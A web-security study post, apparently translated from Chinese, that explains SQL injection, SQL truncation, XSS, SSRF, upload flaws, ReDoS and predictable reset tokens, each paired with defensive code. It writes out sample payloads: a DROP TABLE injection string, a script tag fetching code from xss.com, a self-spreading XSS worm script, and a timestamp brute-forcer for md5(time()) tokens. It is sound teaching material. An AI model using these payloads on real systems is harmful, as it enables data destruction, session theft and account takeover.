Web Security Study Notes

 

This article is currently an experimental machine translation and may contain errors. If anything is unclear, please refer to the original Chinese version. I am continuously working to improve the translation.

Originally meant as internal club training material—just dumping it on the blog to pad the post count.

A record of some common Web attacks and defense methods.

SQL Injection

SQL injection is a security vulnerability that occurs at the application-database layer. In short, it involves injecting SQL commands into input strings. In poorly designed programs that fail to properly validate input characters, these malicious commands may be mistakenly interpreted and executed by the database server, leading to data compromise or unauthorized access.

Incorrect example (Java):

PreparedStatement stat = conn.prepareStatement("INSERT INTO User (name, email, password, salt) VALUES ( '" + user.getName() + "', '" + user.getEmail() + "', '" + user.getPasswordHash() + "', '"+ user.getSalt() + "');");
stat.executeUpdate();

If the user inputs: name test, email 123@example.com, password xxx, the final SQL statement becomes:

INSERT INTO User (name, email, password, salt) VALUES ('test', '123@example.com', 'hash', 'salt');

This executes normally and does not trigger a vulnerability.

But if the username is: test','','','');DROP TABLE User;#

The resulting SQL becomes:

INSERT INTO User (name, email, password, salt) VALUES ('test','','','');DROP TABLE User;#', '123@example.com', 'hash', 'salt');

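The attacker’s input alters the original semantics of the SQL statement: the first quote closes the name value early, DROP TABLE User; follows as a second statement, and # (a comment marker in MySQL) discards the leftover fragment. Whether the stacked statement actually runs depends on the driver configuration (MySQL Connector/J, for instance, only executes multiple statements when allowMultiQueries is enabled), but the query has been hijacked either way.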

SQL injection isn’t just for deleting databases and running away.

In cases with visible output (error-based or union-based), it can also lead to database content leakage, for example using: 1' OR '1'='1

SELECT * FROM User WHERE name = '1' OR '1'='1';

And in some cases, by exploiting database-specific features, attackers may even modify the file system or gain server access.

Correct approach: Use Prepared Statements to ensure semantic integrity. Never concatenate SQL strings manually!

PreparedStatement stat = conn.prepareStatement("INSERT INTO User (name, email, password, salt) VALUES (?, ?, ?, ?);");
stat.setString(1, user.getName());
stat.setString(2, user.getEmail());
stat.setString(3, user.getPasswordHash());
stat.setString(4, user.getSalt());
stat.executeUpdate();

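Alternative fix: properly escape user input with the database driver's own escaping function. This is more error-prone than prepared statements, so treat it as a fallback. In PHP with mysqli, for example:

mysqli_real_escape_string ( mysqli $link , string $escapestr ) : string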

SQL Truncation

Suppose the username field in the database is defined as varchar(32).

Assume there’s already an admin user named admin.

Now a new user tries to register with the username admin, followed by 27 spaces, followed by x (33 characters in total).

“admin” plus 27 spaces fills exactly 32 characters. During the username uniqueness check, the server sees the 33-character string as a new name and allows registration. When the value is inserted into the database, however, it is truncated to 32 characters, so the trailing “x” is dropped, and the remaining trailing spaces are stripped or ignored in comparisons. The stored username is then effectively admin, colliding with the existing admin account. This can lead to authentication or authorization bugs.

The root cause: some SQL servers (MySQL with strict mode turned off, for example) silently truncate overly long inputs, issuing a warning but allowing the operation to succeed.

Any field requiring uniqueness may be vulnerable to SQL truncation.

Defense: Validate input length on the backend, or configure the SQL server to strict mode, turning truncation warnings into errors.
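
A minimal sketch of the backend length check, assuming the varchar(32) column from the example above. The class and method names (UsernameValidator, isAcceptable) are hypothetical and not part of any framework; the whitespace rule is an extra assumption that closes the "admin plus spaces" collision.

```java
final class UsernameValidator {
    // Assumed to match the varchar(32) column used in the example.
    static final int MAX_USERNAME_LENGTH = 32;

    /** Returns true only if the name fits the column and has no leading/trailing whitespace. */
    static boolean isAcceptable(String name) {
        if (name == null || name.isEmpty()) {
            return false;
        }
        // Count code points rather than UTF-16 units, since varchar(N) limits characters.
        int length = name.codePointCount(0, name.length());
        if (length > MAX_USERNAME_LENGTH) {
            return false; // a non-strict server would silently truncate this value
        }
        // Reject edge whitespace so "admin   " cannot collide with "admin".
        return name.equals(name.strip());
    }
}
```

The check should run before the uniqueness query, so that the string being compared is the same string that ends up stored.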

XSS (Cross-Site Scripting)

Cross-site scripting (XSS) is a security vulnerability in web applications and a form of code injection. It allows attackers to inject code into web pages viewed by other users, potentially compromising their sessions or redirecting them to malicious sites. These attacks often involve HTML and client-side scripting languages like JavaScript.

For example, a server-side template renders:

<p>Username: {{ username }}</p>

If the user inputs: user<script src="https://xss.com/a.js"></script>

And no input sanitization is applied, the final HTML becomes:

<p>Username: user<script src="https://xss.com/a.js"></script></p>

The semantics of the HTML have now changed.

Every other user who views this username will have their browser parse and execute the <script> tag, loading and running the attacker-controlled JavaScript file from https://xss.com/a.js.

Since the script runs inside the vulnerable site's own origin in the browser of every user who sees it, the Same-Origin Policy (SOP) does not restrict it. It can steal improperly configured (non-HttpOnly) cookies or session tokens, redirect users to phishing pages (e.g., fake login forms), log keystrokes, or access internal network resources.

XSS worms are also possible.

Suppose the site allows changing usernames via POST to https://example.com/v1/users/change_nickname.

An attacker could craft the following payload:

Username: user<script src="https://xss.com/a.js"></script>
a.js:
$.post("https://example.com/v1/users/change_nickname", {name: "user<script src=\"https://xss.com/a.js\"></script>"});

Without the user’s knowledge, the malicious script forges a request (leveraging CSRF) to change the victim’s username to include the same malicious script, enabling rapid self-propagation.

Defense: Validate and escape user input, set up server-side CSP, and implement CSRF protection.

Content Security Policy (CSP) is an added security layer that helps detect and mitigate certain types of attacks, including cross-site scripting (XSS) and data injection. These attacks are often used to steal data, deface websites, or distribute malware.
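
The escaping half of that defense can be sketched as follows. This is a hand-rolled illustration only: HtmlEscaper and escapeHtml are hypothetical names, and in a real project the template engine's built-in auto-escaping is usually the better choice.

```java
final class HtmlEscaper {
    /** Escapes the five characters that are significant in HTML text and attribute values. */
    static String escapeHtml(String input) {
        StringBuilder out = new StringBuilder(input.length() + 16);
        for (int i = 0; i < input.length(); i++) {
            char c = input.charAt(i);
            switch (c) {
                case '&': out.append("&amp;"); break;
                case '<': out.append("&lt;"); break;
                case '>': out.append("&gt;"); break;
                case '"': out.append("&quot;"); break;
                case '\'': out.append("&#39;"); break;
                default: out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        String username = "user<script src=\"https://xss.com/a.js\"></script>";
        // Prints: <p>Username: user&lt;script src=&quot;https://xss.com/a.js&quot;&gt;&lt;/script&gt;</p>
        System.out.println("<p>Username: " + escapeHtml(username) + "</p>");
    }
}
```

With the input escaped, the browser shows the payload as text instead of parsing a script tag. As a second layer, a response header such as Content-Security-Policy: script-src 'self' tells the browser to refuse scripts from other origins such as xss.com, even if an escaping bug slips through.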

CSRF

Already covered in a previous post.

SSRF (Server-Side Request Forgery)

Server-Side Request Forgery (SSRF) refers to a vulnerability where an attacker, without full server access, exploits the server to send a crafted request to internal systems that are otherwise inaccessible from the outside. SSRF attacks often target internal services behind firewalls.

For example, suppose the site has a feature where users submit a URL (e.g., https://www.baidu.com/), and the server fetches the page title or logo to generate a preview card.

But if a malicious user submits http://192.168.1.1/, the server might retrieve and expose internal network information that should not be public.

Attackers can also use other protocols like file:// or dict:// to access sensitive local files or services.

Defense: This article explains it well.
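
As a rough illustration of one common mitigation (not necessarily what the linked article recommends), the server can check a submitted URL before fetching it: allow only http and https, and refuse hosts that resolve to loopback, private, or link-local addresses. PreviewUrlChecker and isAllowed are hypothetical names.

```java
import java.net.InetAddress;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.UnknownHostException;

final class PreviewUrlChecker {
    /** Returns true if the URL uses http(s) and every resolved address looks public. */
    static boolean isAllowed(String url) {
        URI uri;
        try {
            uri = new URI(url);
        } catch (URISyntaxException e) {
            return false;
        }
        String scheme = uri.getScheme();
        String host = uri.getHost();
        if (scheme == null || host == null) {
            return false; // e.g. file:///etc/passwd has no host
        }
        if (!scheme.equalsIgnoreCase("http") && !scheme.equalsIgnoreCase("https")) {
            return false; // blocks file://, dict://, gopher://, ...
        }
        try {
            // A hostname may resolve to several addresses; all of them must pass.
            for (InetAddress addr : InetAddress.getAllByName(host)) {
                if (addr.isLoopbackAddress() || addr.isSiteLocalAddress()
                        || addr.isLinkLocalAddress() || addr.isAnyLocalAddress()
                        || addr.isMulticastAddress()) {
                    return false;
                }
            }
        } catch (UnknownHostException e) {
            return false;
        }
        return true;
    }
}
```

This sketch is incomplete on purpose: it does not follow redirects, does not cover every reserved range (IPv6 unique local addresses, for instance), and a hostname can resolve differently between the check and the actual fetch (DNS rebinding). A production setup would also pin the resolved address for the request or fetch through an isolated proxy.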

File Upload (.htaccess / Path Traversal / PHP Web Shell)

If files are saved directly using /somepath/<filename_provided_by_user>:

  • If the user names the file .htaccess, it could override Apache configurations and introduce security risks.
  • If the filename is ./../somename.php, the file may be saved to a parent directory (directory traversal).
  • Uploading a PHP file could allow arbitrary code execution on the server.

Best practices: Save uploaded files with random names (e.g., UUID), inspect file content, and secure server configurations.
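
A minimal sketch of the random-name approach, assuming uploads go into a single directory. UploadNamer, storagePathFor, and the extension allow-list are all hypothetical and should be adapted to the application.

```java
import java.nio.file.Path;
import java.util.Locale;
import java.util.Set;
import java.util.UUID;

final class UploadNamer {
    // Hypothetical allow-list; keep it as small as the application permits.
    private static final Set<String> ALLOWED_EXTENSIONS = Set.of("png", "jpg", "gif", "pdf");

    /**
     * Builds a storage path under uploadDir. The client-supplied name is used
     * only to pick an allow-listed extension; the rest is a random UUID.
     */
    static Path storagePathFor(Path uploadDir, String clientFilename) {
        int dot = clientFilename.lastIndexOf('.');
        String ext = dot < 0 ? "" : clientFilename.substring(dot + 1).toLowerCase(Locale.ROOT);
        if (!ALLOWED_EXTENSIONS.contains(ext)) {
            // Rejects .htaccess, *.php, and names without an extension.
            throw new IllegalArgumentException("File type not allowed");
        }
        Path base = uploadDir.toAbsolutePath().normalize();
        Path target = base.resolve(UUID.randomUUID() + "." + ext).normalize();
        // Defensive check: the final path must stay inside the upload directory.
        if (!target.startsWith(base)) {
            throw new IllegalArgumentException("Resolved path escapes upload directory");
        }
        return target;
    }
}
```

The extension check only decides the stored name. It says nothing about what the file actually contains, so content inspection and a server configuration that never executes files from the upload directory are still needed.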

For more details, see: https://misakikata.github.io/2019/05/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/

Catastrophic Backtracking in Regular Expressions

Using a flawed regex to validate email addresses:

^([0-9a-zA-Z]([-.\w]*[0-9a-zA-Z])*@(([0-9a-zA-Z])+([-\w]*[0-9a-zA-Z])*\.)+[a-zA-Z]{2,9})$

When the input is a@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!, catastrophic backtracking occurs. The nested quantifiers can match the same run of "a" characters in many different ways, and once the trailing "!" makes the match fail, a backtracking regex engine tries every one of those combinations, so processing time grows exponentially with input length. This may consume excessive CPU, freeze the program, or result in a ReDoS (Regular Expression Denial of Service) attack.

Solutions: Optimize the regex (reduce nesting, avoid quantifier conflicts), avoid regex in performance-critical contexts, or use more efficient regex libraries.
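
One way to apply the "reduce nesting" advice is sketched below. The pattern is a deliberately looser stand-in written for this note, not an equivalent of the regex above: every repeated group starts with a literal dot, so the engine has only one way to split the input. EmailCheck, looksLikeEmail, and the 254-character cap are assumptions.

```java
import java.util.regex.Pattern;

final class EmailCheck {
    // Assumed upper bound on address length; capping input limits worst-case work.
    private static final int MAX_LENGTH = 254;

    // No quantified group contains another quantifier over an overlapping
    // character class: domain labels are separated by a literal '.', which
    // the label class [-\w] cannot match.
    private static final Pattern SIMPLE_EMAIL = Pattern.compile(
            "^[0-9a-zA-Z][-.\\w]*@[0-9a-zA-Z][-\\w]*(?:\\.[0-9a-zA-Z][-\\w]*)*\\.[a-zA-Z]{2,9}$");

    /** Cheap plausibility check; it does not prove the address exists. */
    static boolean looksLikeEmail(String input) {
        return input != null
                && input.length() <= MAX_LENGTH
                && SIMPLE_EMAIL.matcher(input).matches();
    }
}
```

With this pattern the problematic input from above is rejected after a single linear pass of backtracking. For anything beyond a plausibility check, sending a confirmation email is more reliable than a stricter regex.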

Random Number Security

Suppose password reset links are generated like this:

https://example.com/account/reset_password?token=md5(time())

An attacker could request a reset for their own account and guess the server’s timestamp to generate valid tokens for other users, allowing unauthorized password changes.
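
To show how small the search space is, the sketch below mirrors md5(time()) and recovers the server's timestamp from a token the attacker received for their own account. It assumes the token is the hex MD5 of the Unix time in seconds written as a decimal string (as PHP's md5(time()) would produce); PredictableTokenDemo and its methods are hypothetical names.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

final class PredictableTokenDemo {
    /** Hex MD5 of the Unix timestamp (seconds) written as a decimal string. */
    static String tokenFor(long unixSeconds) {
        try {
            MessageDigest md5 = MessageDigest.getInstance("MD5");
            byte[] digest = md5.digest(
                    Long.toString(unixSeconds).getBytes(StandardCharsets.US_ASCII));
            StringBuilder hex = new StringBuilder();
            for (byte b : digest) {
                hex.append(String.format("%02x", b & 0xff));
            }
            return hex.toString();
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException(e);
        }
    }

    /** Tries every second in [guess - window, guess + window]; returns the match or -1. */
    static long recoverTimestamp(String token, long guess, long windowSeconds) {
        for (long t = guess - windowSeconds; t <= guess + windowSeconds; t++) {
            if (tokenFor(t).equals(token)) {
                return t;
            }
        }
        return -1;
    }
}
```

Even with a clock that is off by a minute, at most 121 candidates need to be checked. Once the offset is known, the token for a reset requested on another account a moment later is one of a handful of values.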

Similarly, if private files are protected only by random filenames, those names may be predictable and lead to data exposure.

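Many programming languages’ default random number generators (java.util.Random, for example) are not cryptographically secure: they are often seeded from the clock, and their output can be predicted. Time-based UUIDs (version 1) likewise embed a timestamp.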

Best practice: Use cryptographically secure random generators (e.g., SecureRandom) when security is required.
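
A minimal sketch of generating a reset token with SecureRandom. The class name ResetTokens and the 32-byte length are assumptions chosen for illustration.

```java
import java.security.SecureRandom;
import java.util.Base64;

final class ResetTokens {
    // SecureRandom is thread-safe, so one shared instance is enough.
    private static final SecureRandom RNG = new SecureRandom();

    /** Returns a URL-safe token carrying 256 bits from the platform CSPRNG. */
    static String newToken() {
        byte[] bytes = new byte[32];
        RNG.nextBytes(bytes);
        // URL-safe alphabet without padding, so the token fits in a query string.
        return Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
    }
}
```

The token would replace md5(time()) in the reset link. Storing it server-side with an expiry time and invalidating it after one use are sensible additions.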

Summary

Never trust user input. Always validate and sanitize.

Don’t reinvent the wheel. Study your language and framework systematically. Read official documentation and follow established best practices.

This article is licensed under the CC BY-NC-SA 4.0 license.

Author: lyc8503, Article link: https://blog.lyc8503.net/en/post/web-security/